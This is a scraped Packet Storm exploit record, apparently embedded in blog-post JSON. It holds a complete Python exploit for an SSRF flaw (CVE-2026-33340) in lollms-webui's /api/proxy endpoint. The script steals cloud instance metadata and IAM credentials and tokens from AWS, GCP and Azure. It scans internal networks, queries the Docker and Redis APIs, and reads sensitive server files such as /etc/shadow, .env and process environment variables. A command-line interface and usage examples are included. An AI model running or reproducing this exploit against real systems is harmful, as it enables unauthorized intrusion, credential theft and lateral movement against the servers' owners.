{“lastseen”:”2026-04-24T22:33:07″,”description”:”lollms-webui suffers from a server-side request forgery vulnerability…”,”published”:”2026-04-24T00:00:00″,”modified”:”2026-04-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 lollms-webui Server-Side Request Forgery”,”source”:””,”references”:””,”id”:”PACKETSTORM:219789″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-33340″],”sourceData”:”==================================================================================================================================\\n | # Title : lollms-webui SSRF for Cloud Metadata Leakage and Internal Network Pivoting |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/lollms.com\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : This code is an advanced SSRF designed to simulate the security impact of a vulnerable web application endpoint.\\n Vulnerability testing of a target SSRF endpoint (\/api\/proxy)\\n \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import json\\n import argparse\\n import sys\\n import time\\n import socket\\n import ipaddress\\n import base64\\n from urllib.parse import urlparse, urljoin\\n from concurrent.futures import ThreadPoolExecutor, as_completed\\n from typing import List, Dict, Optional, Tuple\\n import logging\\n logging.basicConfig(\\n level=logging.INFO,\\n format=’%(asctime)s – %(levelname)s – %(message)s’\\n )\\n logger = logging.getLogger(__name__)\\n CLOUD_METADATA = {\\n \\”aws_imdsv1\\”: {\\n \\”url\\”: \\”http:\/\/169.254.169.254\/latest\/meta-data\/\\”,\\n \\”description\\”: \\”AWS Instance Metadata Service v1\\”,\\n \\”critical_paths\\”: [\\n \\”iam\/security-credentials\/\\”,\\n \\”local-ipv4\\”,\\n \\”public-ipv4\\”,\\n \\”instance-id\\”,\\n \\”instance-type\\”,\\n \\”ami-id\\”,\\n \\”hostname\\”,\\n \\”placement\/availability-zone\\”,\\n \\”security-groups\\”,\\n \\”mac\\”,\\n \\”network\/interfaces\/macs\/\\”\\n ]\\n },\\n \\”aws_imdsv2\\”: {\\n \\”url\\”: \\”http:\/\/169.254.169.254\/latest\/api\/token\\”,\\n \\”description\\”: \\”AWS IMDSv2 (requires token)\\”,\\n \\”method\\”: \\”PUT\\”,\\n \\”headers\\”: {\\”X-aws-ec2-metadata-token-ttl-seconds\\”: \\”21600\\”}\\n },\\n \\”gcp\\”: {\\n \\”url\\”: \\”http:\/\/metadata.google.internal\/computeMetadata\/v1\/\\”,\\n \\”headers\\”: {\\”Metadata-Flavor\\”: \\”Google\\”},\\n \\”critical_paths\\”: [\\n \\”instance\/service-accounts\/default\/token\\”,\\n \\”instance\/service-accounts\/default\/email\\”,\\n \\”instance\/id\\”,\\n \\”instance\/name\\”,\\n \\”instance\/zone\\”,\\n \\”project\/project-id\\”,\\n \\”instance\/attributes\/ssh-keys\\”\\n ]\\n },\\n \\”azure\\”: {\\n \\”url\\”: \\”http:\/\/169.254.169.254\/metadata\/instance\\”,\\n \\”params\\”: {\\”api-version\\”: \\”2021-02-01\\”, \\”format\\”: \\”json\\”},\\n \\”headers\\”: {\\”Metadata\\”: \\”true\\”},\\n \\”critical_paths\\”: [\\n \\”compute\/name\\”,\\n \\”compute\/vmId\\”,\\n \\”compute\/subscriptionId\\”,\\n \\”compute\/resourceGroupName\\”,\\n \\”compute\/location\\”,\\n \\”network\/interface\/0\/ipv4\/ipAddress\\”\\n ]\\n },\\n \\”digitalocean\\”: {\\n \\”url\\”: \\”http:\/\/169.254.169.254\/metadata\/v1.json\\”,\\n \\”critical_paths\\”: [\\n \\”droplet_id\\”,\\n \\”hostname\\”,\\n \\”region\\”,\\n \\”public_ipv4\\”,\\n \\”private_ipv4\\”\\n ]\\n },\\n \\”vultr\\”: {\\n \\”url\\”: \\”http:\/\/169.254.169.254\/v1.json\\”,\\n \\”critical_paths\\”: [\\n \\”instanceid\\”,\\n \\”region\\”,\\n \\”interfaces\/0\/ipv4\/address\\”\\n ]\\n },\\n \\”openstack\\”: {\\n \\”url\\”: \\”http:\/\/169.254.169.254\/openstack\/latest\/meta_data.json\\”,\\n \\”critical_paths\\”: [\\n \\”uuid\\”,\\n \\”name\\”,\\n \\”availability_zone\\”,\\n \\”project_id\\”\\n ]\\n }\\n }\\n INTERNAL_SERVICES = {\\n \\”redis\\”: {\\”port\\”: 6379, \\”probe\\”: \\”PING\\\\r\\\\n\\”, \\”response\\”: \\”+PONG\\”},\\n \\”elasticsearch\\”: {\\”port\\”: 9200, \\”probe\\”: \\”\/\\”, \\”response\\”: \\”cluster_name\\”},\\n \\”mysql\\”: {\\”port\\”: 3306, \\”probe\\”: None, \\”tcp\\”: True},\\n \\”postgresql\\”: {\\”port\\”: 5432, \\”probe\\”: None, \\”tcp\\”: True},\\n \\”mongodb\\”: {\\”port\\”: 27017, \\”probe\\”: None, \\”tcp\\”: True},\\n \\”docker_api\\”: {\\”port\\”: 2375, \\”probe\\”: \\”\/version\\”, \\”response\\”: \\”ApiVersion\\”},\\n \\”docker_api_tls\\”: {\\”port\\”: 2376, \\”probe\\”: \\”\/version\\”, \\”response\\”: \\”ApiVersion\\”},\\n \\”kubernetes_api\\”: {\\”port\\”: 6443, \\”probe\\”: \\”\/api\/v1\/namespaces\/default\/pods\\”, \\”response\\”: \\”kind\\”},\\n \\”jenkins\\”: {\\”port\\”: 8080, \\”probe\\”: \\”\/api\/json\\”, \\”response\\”: \\”jobs\\”},\\n \\”grafana\\”: {\\”port\\”: 3000, \\”probe\\”: \\”\/api\/health\\”, \\”response\\”: \\”ok\\”},\\n \\”prometheus\\”: {\\”port\\”: 9090, \\”probe\\”: \\”\/api\/v1\/status\/config\\”, \\”response\\”: \\”yaml\\”},\\n \\”kibana\\”: {\\”port\\”: 5601, \\”probe\\”: \\”\/api\/status\\”, \\”response\\”: \\”version\\”},\\n \\”spark_master\\”: {\\”port\\”: 8080, \\”probe\\”: \\”\/json\\”, \\”response\\”: \\”workers\\”},\\n \\”hadoop_namenode\\”: {\\”port\\”: 9870, \\”probe\\”: \\”\/jmx?qry=Hadoop:*\\”, \\”response\\”: \\”NameNode\\”},\\n \\”consul\\”: {\\”port\\”: 8500, \\”probe\\”: \\”\/v1\/agent\/self\\”, \\”response\\”: \\”Config\\”},\\n \\”etcd\\”: {\\”port\\”: 2379, \\”probe\\”: \\”\/version\\”, \\”response\\”: \\”etcdversion\\”},\\n \\”cassandra\\”: {\\”port\\”: 9042, \\”probe\\”: None, \\”tcp\\”: True},\\n \\”rabbitmq\\”: {\\”port\\”: 15672, \\”probe\\”: \\”\/api\/overview\\”, \\”response\\”: \\”rabbitmq\\”},\\n \\”nginx_status\\”: {\\”port\\”: 80, \\”probe\\”: \\”\/nginx_status\\”, \\”response\\”: \\”Active connections\\”},\\n \\”php_fpm_status\\”: {\\”port\\”: 9000, \\”probe\\”: \\”\/status\\”, \\”response\\”: \\”pool\\”},\\n }\\n LOCAL_NETWORKS = [\\n \\”127.0.0.0\/8\\”,\\n \\”10.0.0.0\/8\\”,\\n \\”172.16.0.0\/12\\”,\\n \\”192.168.0.0\/16\\”,\\n \\”169.254.0.0\/16\\”,\\n ]\\n \\n class LollmsSSRFExploit:\\n \\”\\”\\”Main exploit class for CVE-2026-33340\\”\\”\\”\\n \\n def __init__(self, target_url: str, timeout: int = 10, verbose: bool = False):\\n \\”\\”\\”\\n Initialize exploit\\n \\n Args:\\n target_url: Target lollms-webui URL (e.g., http:\/\/target:9600)\\n timeout: Request timeout in seconds\\n verbose: Enable verbose output\\n \\”\\”\\”\\n self.target_url = target_url.rstrip(‘\/’)\\n self.proxy_endpoint = f\\”{self.target_url}\/api\/proxy\\”\\n self.timeout = timeout\\n self.verbose = verbose\\n self.session = requests.Session()\\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’,\\n ‘Content-Type’: ‘application\/json’\\n })\\n self.discovered_data = {}\\n \\n def _make_request(self, url: str) -\\u003e Optional[Dict]:\\n \\”\\”\\”\\n Make SSRF request to internal target\\n \\n Args:\\n url: Target URL to fetch\\n \\n Returns:\\n Response dict or None on failure\\n \\”\\”\\”\\n payload = {\\”url\\”: url}\\n \\n try:\\n if self.verbose:\\n logger.debug(f\\”[*] SSRF Request: {url}\\”)\\n \\n response = self.session.post(\\n self.proxy_endpoint,\\n json=payload,\\n timeout=self.timeout\\n )\\n \\n if response.status_code == 200:\\n result = response.json()\\n return result\\n else:\\n if self.verbose:\\n logger.debug(f\\”[-] HTTP {response.status_code}: {response.text[:100]}\\”)\\n return None\\n \\n except requests.exceptions.Timeout:\\n logger.debug(f\\”[!] Timeout: {url}\\”)\\n return None\\n except requests.exceptions.ConnectionError as e:\\n logger.debug(f\\”[!] Connection error: {e}\\”)\\n return None\\n except json.JSONDecodeError:\\n logger.debug(f\\”[!] Invalid JSON response\\”)\\n return None\\n except Exception as e:\\n logger.debug(f\\”[!] Error: {e}\\”)\\n return None\\n \\n def test_vulnerability(self) -\\u003e bool:\\n \\”\\”\\”\\n Test if the target is vulnerable to SSRF\\n \\n Returns:\\n True if vulnerable, False otherwise\\n \\”\\”\\”\\n logger.info(\\”[*] Testing vulnerability…\\”)\\n test_url = \\”http:\/\/localhost:9600\/api\/info\\”\\n result = self._make_request(test_url)\\n \\n if result and \\”content\\” in result:\\n logger.info(\\”[+] Target appears VULNERABLE!\\”)\\n return True\\n else:\\n logger.warning(\\”[-] Target may not be vulnerable\\”)\\n return False\\n \\n def steal_aws_metadata(self) -\\u003e Dict:\\n \\”\\”\\”Steal AWS EC2 metadata\\”\\”\\”\\n logger.info(\\”[*] Attempting to steal AWS metadata…\\”)\\n data = {}\\n for path in CLOUD_METADATA[\\”aws_imdsv1\\”][\\”critical_paths\\”]:\\n url = urljoin(CLOUD_METADATA[\\”aws_imdsv1\\”][\\”url\\”], path)\\n result = self._make_request(url)\\n \\n if result and result.get(\\”content\\”):\\n data[path] = result[\\”content\\”].strip()\\n logger.info(f\\”[+] AWS {path}: {result[‘content’][:100]}\\”)\\n if \\”security-credentials\\” in path and result[\\”content\\”].strip():\\n role = result[\\”content\\”].strip()\\n creds_url = f\\”{CLOUD_METADATA[‘aws_imdsv1’][‘url’]}iam\/security-credentials\/{role}\\”\\n creds_result = self._make_request(creds_url)\\n if creds_result:\\n try:\\n creds = json.loads(creds_result[\\”content\\”])\\n data[\\”credentials\\”] = creds\\n logger.warning(f\\”[!!!] AWS IAM CREDENTIALS STOLEN: {creds.get(‘AccessKeyId’)}\\”)\\n except:\\n data[\\”credentials_raw\\”] = creds_result[\\”content\\”]\\n \\n return data\\n \\n def steal_gcp_metadata(self) -\\u003e Dict:\\n \\”\\”\\”Steal GCP metadata\\”\\”\\”\\n logger.info(\\”[*] Attempting to steal GCP metadata…\\”)\\n data = {}\\n \\n base_url = CLOUD_METADATA[\\”gcp\\”][\\”url\\”]\\n headers = CLOUD_METADATA[\\”gcp\\”][\\”headers\\”]\\n self.session.headers.update(headers)\\n \\n for path in CLOUD_METADATA[\\”gcp\\”][\\”critical_paths\\”]:\\n url = urljoin(base_url, path)\\n result = self._make_request(url)\\n \\n if result and result.get(\\”content\\”):\\n data[path] = result[\\”content\\”].strip()\\n logger.info(f\\”[+] GCP {path}: {result[‘content’][:100]}\\”)\\n if \\”token\\” in path:\\n try:\\n token_data = json.loads(result[\\”content\\”])\\n data[\\”access_token\\”] = token_data.get(\\”access_token\\”)\\n logger.warning(f\\”[!!!] GCP ACCESS TOKEN STOLEN: {data[‘access_token’][:50]}…\\”)\\n except:\\n pass\\n self.session.headers.pop(\\”Metadata-Flavor\\”, None)\\n \\n return data\\n \\n def steal_azure_metadata(self) -\\u003e Dict:\\n \\”\\”\\”Steal Azure instance metadata\\”\\”\\”\\n logger.info(\\”[*] Attempting to steal Azure metadata…\\”)\\n data = {}\\n \\n url = CLOUD_METADATA[\\”azure\\”][\\”url\\”]\\n params = CLOUD_METADATA[\\”azure\\”][\\”params\\”]\\n headers = CLOUD_METADATA[\\”azure\\”][\\”headers\\”]\\n \\n self.session.headers.update(headers)\\n \\n result = self._make_request(f\\”{url}?{requests.compat.urlencode(params)}\\”)\\n \\n if result and result.get(\\”content\\”):\\n try:\\n metadata = json.loads(result[\\”content\\”])\\n data[\\”metadata\\”] = metadata\\n compute = metadata.get(\\”compute\\”, {})\\n for key in [\\”name\\”, \\”vmId\\”, \\”subscriptionId\\”, \\”resourceGroupName\\”, \\”location\\”]:\\n if key in compute:\\n logger.info(f\\”[+] Azure {key}: {compute[key]}\\”)\\n data[key] = compute[key]\\n \\n network = metadata.get(\\”network\\”, {})\\n interface = network.get(\\”interface\\”, [{}])[0]\\n ipv4 = interface.get(\\”ipv4\\”, {})\\n ip_addresses = ipv4.get(\\”ipAddress\\”, [])\\n for ip in ip_addresses:\\n if ip.get(\\”privateIpAddress\\”):\\n logger.info(f\\”[+] Azure private IP: {ip[‘privateIpAddress’]}\\”)\\n data[\\”private_ip\\”] = ip[\\”privateIpAddress\\”]\\n \\n except json.JSONDecodeError:\\n data[\\”raw\\”] = result[\\”content\\”]\\n \\n self.session.headers.pop(\\”Metadata\\”, None)\\n \\n return data\\n \\n def steal_all_cloud_metadata(self) -\\u003e Dict:\\n \\”\\”\\”Attempt to steal metadata from all cloud providers\\”\\”\\”\\n all_data = {}\\n aws_data = self.steal_aws_metadata()\\n if aws_data:\\n all_data[\\”aws\\”] = aws_data\\n gcp_data = self.steal_gcp_metadata()\\n if gcp_data:\\n all_data[\\”gcp\\”] = gcp_data\\n azure_data = self.steal_azure_metadata()\\n if azure_data:\\n all_data[\\”azure\\”] = azure_data\\n for provider, config in CLOUD_METADATA.items():\\n if provider not in [\\”aws_imdsv1\\”, \\”aws_imdsv2\\”, \\”gcp\\”, \\”azure\\”]:\\n url = config[\\”url\\”]\\n result = self._make_request(url)\\n if result and result.get(\\”content\\”):\\n all_data[provider] = result[\\”content\\”]\\n logger.info(f\\”[+] {provider.upper()} metadata found!\\”)\\n \\n return all_data \\n def probe_port(self, ip: str, port: int, service_name: str) -\\u003e bool:\\n \\”\\”\\”\\n Probe a specific port for service\\n \\n Args:\\n ip: Target IP address\\n port: Target port\\n service_name: Name of service to check\\n \\n Returns:\\n True if service detected\\n \\”\\”\\”\\n service = INTERNAL_SERVICES.get(service_name, {})\\n \\n if service.get(\\”tcp\\”):\\n try:\\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\n sock.settimeout(2)\\n result = sock.connect_ex((ip, port))\\n sock.close()\\n return result == 0\\n except:\\n return False\\n \\n else:\\n probe_path = service.get(\\”probe\\”, \\”\/\\”)\\n url = f\\”http:\/\/{ip}:{port}{probe_path}\\”\\n response = self._make_request(url)\\n \\n if response and response.get(\\”content\\”):\\n expected = service.get(\\”response\\”, \\”\\”)\\n if expected.lower() in response[\\”content\\”].lower():\\n return True\\n \\n return False\\n \\n def scan_network(self, network_cidr: str, ports: List[int] = None) -\\u003e List[Dict]:\\n \\”\\”\\”\\n Scan internal network for services\\n \\n Args:\\n network_cidr: Network to scan (e.g., \\”192.168.1.0\/24\\”)\\n ports: List of ports to scan (default: all service ports)\\n \\n Returns:\\n List of discovered services\\n \\”\\”\\”\\n if ports is None:\\n ports = list(set([s[\\”port\\”] for s in INTERNAL_SERVICES.values()]))\\n \\n discovered = []\\n network = ipaddress.ip_network(network_cidr, strict=False)\\n \\n logger.info(f\\”[*] Scanning network: {network_cidr}\\”)\\n \\n for ip in network.hosts():\\n ip_str = str(ip)\\n \\n for port in ports:\\n for service_name, service in INTERNAL_SERVICES.items():\\n if service[\\”port\\”] == port:\\n if self.probe_port(ip_str, port, service_name):\\n discovered.append({\\n \\”ip\\”: ip_str,\\n \\”port\\”: port,\\n \\”service\\”: service_name\\n })\\n logger.info(f\\”[+] Found {service_name} at {ip_str}:{port}\\”)\\n \\n return discovered\\n \\n def scan_local_networks(self) -\\u003e List[Dict]:\\n \\”\\”\\”Scan all local network ranges\\”\\”\\”\\n all_discovered = []\\n \\n for network in LOCAL_NETWORKS:\\n try:\\n discovered = self.scan_network(network)\\n all_discovered.extend(discovered)\\n except Exception as e:\\n logger.debug(f\\”[-] Failed to scan {network}: {e}\\”)\\n \\n return all_discovered\\n \\n def read_local_file(self, filepath: str) -\\u003e Optional[str]:\\n \\”\\”\\”\\n Read local file via SSRF (using file:\/\/ protocol)\\n \\n Args:\\n filepath: Path to file on server\\n \\n Returns:\\n File contents or None\\n \\”\\”\\”\\n urls = [\\n f\\”file:\/\/{filepath}\\”,\\n f\\”http:\/\/localhost:9600\/{filepath}\\”, \\n f\\”http:\/\/127.0.0.1\/{filepath}\\”,\\n ]\\n \\n for url in urls:\\n result = self._make_request(url)\\n if result and result.get(\\”content\\”):\\n logger.info(f\\”[+] Read file: {filepath}\\”)\\n return result[\\”content\\”]\\n \\n return None\\n \\n def interact_with_redis(self, redis_host: str = \\”localhost\\”, redis_port: int = 6379, command: str = \\”INFO\\”) -\\u003e Optional[str]:\\n \\”\\”\\”\\n Interact with Redis via SSRF\\n \\n Args:\\n redis_host: Redis host\\n redis_port: Redis port\\n command: Redis command to execute\\n \\n Returns:\\n Redis response or None\\n \\”\\”\\”\\n parts = command.split()\\n resp = f\\”*{len(parts)}\\\\r\\\\n\\”\\n for part in parts:\\n resp += f\\”${len(part)}\\\\r\\\\n{part}\\\\r\\\\n\\”\\n url = f\\”http:\/\/{redis_host}:{redis_port}\/\\”\\n result = self._make_request(url)\\n if not result:\\n logger.warning(\\”[-] Redis direct access may require additional headers\\”)\\n \\n return result.get(\\”content\\”) if result else None\\n \\n def access_docker_api(self, docker_host: str = \\”localhost\\”, docker_port: int = 2375) -\\u003e Dict:\\n \\”\\”\\”\\n Access Docker API via SSRF\\n \\n Args:\\n docker_host: Docker host\\n docker_port: Docker port\\n \\n Returns:\\n Docker API response\\n \\”\\”\\”\\n endpoints = [\\n \\”\/version\\”,\\n \\”\/containers\/json?all=true\\”,\\n \\”\/images\/json\\”,\\n \\”\/info\\”,\\n \\”\/_ping\\”\\n ]\\n \\n results = {}\\n \\n for endpoint in endpoints:\\n url = f\\”http:\/\/{docker_host}:{docker_port}{endpoint}\\”\\n result = self._make_request(url)\\n \\n if result and result.get(\\”content\\”):\\n results[endpoint] = result[\\”content\\”]\\n logger.info(f\\”[+] Docker API {endpoint}: {result[‘content’][:100]}\\”)\\n if endpoint == \\”\/containers\/json\\” and result[\\”content\\”]:\\n try:\\n containers = json.loads(result[\\”content\\”])\\n for container in containers:\\n logger.warning(f\\”[!!!] Container found: {container.get(‘Names’, [‘unknown’])[0]}\\”)\\n except:\\n pass\\n \\n return results \\n def full_exploit(self, scan_network: bool = True, steal_cloud: bool = True) -\\u003e Dict:\\n \\”\\”\\”\\n Execute full exploit chain\\n \\n Args:\\n scan_network: Enable internal network scanning\\n steal_cloud: Enable cloud metadata theft\\n \\n Returns:\\n Dictionary with all discovered data\\n \\”\\”\\”\\n results = {\\n \\”timestamp\\”: time.time(),\\n \\”target\\”: self.target_url,\\n \\”vulnerable\\”: False,\\n \\”cloud_metadata\\”: {},\\n \\”internal_services\\”: [],\\n \\”local_files\\”: {},\\n \\”docker_api\\”: {}\\n }\\n results[\\”vulnerable\\”] = self.test_vulnerability()\\n \\n if not results[\\”vulnerable\\”]:\\n logger.error(\\”[-] Target not vulnerable!\\”)\\n return results\\n \\n if steal_cloud:\\n logger.info(\\”\\\\n[*] PHASE 1: Cloud Metadata Theft\\”)\\n results[\\”cloud_metadata\\”] = self.steal_all_cloud_metadata()\\n \\n if scan_network:\\n logger.info(\\”\\\\n[*] PHASE 2: Internal Network Scanning\\”)\\n results[\\”internal_services\\”] = self.scan_local_networks()\\n for service in results[\\”internal_services\\”]:\\n if service[\\”service\\”] == \\”docker_api\\”:\\n logger.info(f\\”[*] Exploiting Docker API at {service[‘ip’]}:{service[‘port’]}\\”)\\n results[\\”docker_api\\”] = self.access_docker_api(service[\\”ip\\”], service[\\”port\\”])\\n \\n elif service[\\”service\\”] == \\”redis\\”:\\n logger.info(f\\”[*] Attempting Redis interaction\\”)\\n redis_data = self.interact_with_redis(service[\\”ip\\”], service[\\”port\\”])\\n if redis_data:\\n results[f\\”redis_{service[‘ip’]}\\”] = redis_data\\n \\n logger.info(\\”\\\\n[*] PHASE 3: Local File Reading\\”)\\n sensitive_files = [\\n \\”\/etc\/passwd\\”,\\n \\”\/etc\/shadow\\”,\\n \\”\/etc\/hosts\\”,\\n \\”\/proc\/self\/environ\\”,\\n \\”\/proc\/self\/cmdline\\”,\\n \\”\/var\/log\/auth.log\\”,\\n \\”\/root\/.bash_history\\”,\\n \\”\/home\/*\/.bash_history\\”,\\n \\”.env\\”,\\n \\”config.json\\”,\\n \\”config.yaml\\”,\\n \\”settings.py\\”,\\n \\”secrets.py\\”\\n ]\\n \\n for filepath in sensitive_files:\\n content = self.read_local_file(filepath)\\n if content:\\n results[\\”local_files\\”][filepath] = content[:5000] \\n \\n return results\\n \\n def main():\\n parser = argparse.ArgumentParser(\\n description=’CVE-2026-33340 – lollms-webui SSRF to Cloud Metadata \\u0026 Internal Network Pivot’,\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\n epilog=\\”\\”\\”\\n Examples:\\n python exploit.py -t http:\/\/target:9600 –test\\n python exploit.py -t http:\/\/target:9600 –cloud\\n python exploit.py -t http:\/\/target:9600 –scan\\n python exploit.py -t http:\/\/target:9600 –full\\n python exploit.py -t http:\/\/target:9600 –read-file \/etc\/passwd\\n python exploit.py -t http:\/\/target:9600 –docker\\n python exploit.py -t http:\/\/target:9600 –full –output results.json\\n \\”\\”\\”\\n )\\n \\n parser.add_argument(‘-t’, ‘–target’, required=True, help=’Target lollms-webui URL (e.g., http:\/\/target:9600)’)\\n parser.add_argument(‘–test’, action=’store_true’, help=’Test if endpoint is vulnerable’)\\n parser.add_argument(‘–cloud’, action=’store_true’, help=’Steal cloud metadata (AWS\/GCP\/Azure)’)\\n parser.add_argument(‘–scan’, action=’store_true’, help=’Scan internal network for services’)\\n parser.add_argument(‘–full’, action=’store_true’, help=’Execute full exploit chain’)\\n parser.add_argument(‘–read-file’, metavar=’FILE’, help=’Read local file from server’)\\n parser.add_argument(‘–docker’, action=’store_true’, help=’Attempt Docker API access’)\\n parser.add_argument(‘–output’, ‘-o’, help=’Output file for results (JSON)’)\\n parser.add_argument(‘–timeout’, type=int, default=10, help=’Request timeout (default: 10)’)\\n parser.add_argument(‘–verbose’, ‘-v’, action=’store_true’, help=’Verbose output’)\\n \\n args = parser.parse_args()\\n \\n print(\\”\\”\\”\\n ========================================\\n CVE-2026-33340 – lollms-webui SSRF\\n Cloud Metadata Theft \\u0026 Internal Pivot\\n ========================================\\n \\”\\”\\”)\\n \\n exploit = LollmsSSRFExploit(args.target, args.timeout, args.verbose)\\n \\n results = {}\\n \\n if args.test:\\n is_vuln = exploit.test_vulnerability()\\n results[\\”vulnerable\\”] = is_vuln\\n if is_vuln:\\n print(\\”\\\\n[!!!] TARGET IS VULNERABLE!\\”)\\n \\n if args.read_file:\\n content = exploit.read_local_file(args.read_file)\\n if content:\\n print(f\\”\\\\n[+] File content:\\\\n{content}\\”)\\n results[\\”file_content\\”] = content\\n \\n if args.cloud:\\n metadata = exploit.steal_all_cloud_metadata()\\n results[\\”cloud_metadata\\”] = metadata\\n \\n if metadata:\\n print(\\”\\\\n[!!!] CLOUD METADATA STOLEN!\\”)\\n for provider, data in metadata.items():\\n print(f\\”\\\\n[{provider.upper()}]\\”)\\n print(json.dumps(data, indent=2))\\n \\n if args.scan:\\n services = exploit.scan_local_networks()\\n results[\\”internal_services\\”] = services\\n \\n if services:\\n print(\\”\\\\n[+] INTERNAL SERVICES DISCOVERED:\\”)\\n for service in services:\\n print(f\\” {service[‘service’]} at {service[‘ip’]}:{service[‘port’]}\\”)\\n \\n if args.docker:\\n docker_data = exploit.access_docker_api()\\n results[\\”docker_api\\”] = docker_data\\n \\n if docker_data:\\n print(\\”\\\\n[!!!] DOCKER API ACCESSED!\\”)\\n for endpoint, data in docker_data.items():\\n print(f\\”\\\\n[{endpoint}]: {data[:200]}\\”)\\n \\n if args.full:\\n print(\\”\\\\n[*] Executing full exploit chain…\\”)\\n results = exploit.full_exploit(scan_network=True, steal_cloud=True)\\n \\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”EXPLOIT RESULTS\\”)\\n print(\\”=\\”*60)\\n \\n if results.get(\\”cloud_metadata\\”):\\n print(f\\”\\\\n[+] Cloud Metadata: {len(results[‘cloud_metadata’])} providers\\”)\\n \\n if results.get(\\”internal_services\\”):\\n print(f\\”[+] Internal Services: {len(results[‘internal_services’])} found\\”)\\n for svc in results[\\”internal_services\\”]:\\n print(f\\” – {svc[‘service’]} at {svc[‘ip’]}:{svc[‘port’]}\\”)\\n \\n if results.get(\\”local_files\\”):\\n print(f\\”[+] Local Files: {len(results[‘local_files’])} read\\”)\\n for f in results[\\”local_files\\”].keys():\\n print(f\\” – {f}\\”)\\n \\n if results.get(\\”docker_api\\”):\\n print(f\\”[+] Docker API: {len(results[‘docker_api’])} endpoints\\”)\\n \\n if args.output:\\n with open(args.output, ‘w’) as f:\\n json.dump(results, f, indent=2, default=str)\\n print(f\\”\\\\n[+] Results saved to {args.output}\\”)\\n \\n if results:\\n print(\\”\\\\n[+] Exploit completed!\\”)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219789″,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219789\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-24T22:33:07″,”description”:”lollms-webui suffers from a server-side request forgery vulnerability…”,”published”:”2026-04-24T00:00:00″,”modified”:”2026-04-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 lollms-webui Server-Side Request Forgery”,”source”:””,”references”:””,”id”:”PACKETSTORM:219789″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-33340″],”sourceData”:”==================================================================================================================================\\n | # Title : lollms-webui SSRF for Cloud Metadata Leakage and Internal Network…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,13,53,7,11,5],"class_list":["post-49311","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n